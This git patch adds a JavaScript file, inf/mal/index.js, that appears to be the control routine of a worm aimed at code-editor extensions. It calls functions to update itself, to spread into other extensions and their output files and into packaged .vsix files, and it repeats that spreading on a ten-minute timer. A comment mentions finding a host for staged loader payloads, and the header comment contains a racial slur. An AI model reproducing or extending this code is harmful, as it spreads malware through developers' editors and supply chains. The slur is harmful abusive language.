From e2d1d18715a7c5b80cce02a96b09a5d57de38072 Mon Sep 17 00:00:00 2001 From: spv Date: Sun, 4 May 2025 20:12:34 -0400 Subject: flawless victory --- inf/mal/index.js | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 inf/mal/index.js (limited to 'inf/mal/index.js') diff --git a/inf/mal/index.js b/inf/mal/index.js new file mode 100644 index 0000000..a87e788 --- /dev/null +++ b/inf/mal/index.js @@ -0,0 +1,20 @@ +/* + * flawless victory, ya niggas can't do shit to me + * physically, lyrically, hypothetically, realistically + */ + +// XXX find a decent host for stage1 loader & stage2.bin + +update_malware(); + +/* spread to other extension's output files if opened in workspace */ +extension_js_spread(); + +/* spread to other extensions in case we get nuked */ +extension_spread(); + +/* spread to any packaged extensions in the current directory */ +vsix_spread(); + +/* keep spreading in case the files get updated / created */ +setInterval(vsix_spread, 600000); \ No newline at end of file -- cgit v1.2.3